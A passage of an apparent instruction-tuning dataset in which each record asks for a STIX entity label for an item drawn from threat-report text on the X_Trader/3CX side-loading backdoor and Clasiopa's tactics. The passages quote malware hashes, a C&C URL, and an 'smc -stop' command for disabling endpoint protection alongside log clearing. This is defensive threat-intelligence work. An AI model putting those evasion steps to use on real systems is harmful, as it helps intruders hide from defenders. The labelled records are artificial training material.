"input": "### Entity:\nmsvcr100.dll\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFirefox\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n3CX\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nf8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nEdge\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwinscard.dll\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ne185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae\n\n---\n\n### Text Passage:\nBackdoor Installation\nOnce installed, the legitimate X_Trader executable side-loads the two malicious DLLs dropped by the installer. The first, winscard.dll, acts as a loader and contains code that will load and execute a payload from the second (msvcr100.dll). The msvcr100.dll file contains an encrypted blob appended to the file. The blob starts with the hex value FEEDFACE, which the loader uses to find the blob.\nThe process for payload installation is almost identical as that seen with the Trojanized 3CX app, where two side-loaded DLLs are used to extract a payload from an encrypted blob.\nIn this attack, the payload extracted is a modular backdoor called Veiledsignal (SHA256: e185c99b3d1085aed9fda65a9774abd73ecf1229f14591606c6c59e9660c4345). Veiledsignal contains another DLL (SHA256: 19442d9e476e3ef990ce57b683190301e946ccb28fc88b69ab53a93bf84464ae), which is a process-injection module. This can be injected into the Chrome, Firefox, or Edge web browsers. The module contains a second DLL (SHA256: f8c370c67ffb3a88107c9022b17382b5465c4af3dd453e50e4a0bd3ae9b012ce), which is a command-and-control (C&C) module. It connects to the following C&C URL:\n* https://www.tradingtechnologies.com/trading/order-management\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPowerShell\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nClasiopa\n\n---\n\n### Text Passage:\nClasiopa Tactics, Techniques, and Procedures\nThe infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.\nAside from the distinct toolset used, there were a number of attack hallmarks observed:\n* The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip\n* An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using \"smc -stop\". Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.\n* The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.\n* Sysmon logs were cleared using wsmprovhost.\n* All eventlogs were cleared using PowerShell.\n* A scheduled task named \"network service\" was created to list file names.\nThere is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named \u201cdgs\u201d and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.\nHCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is 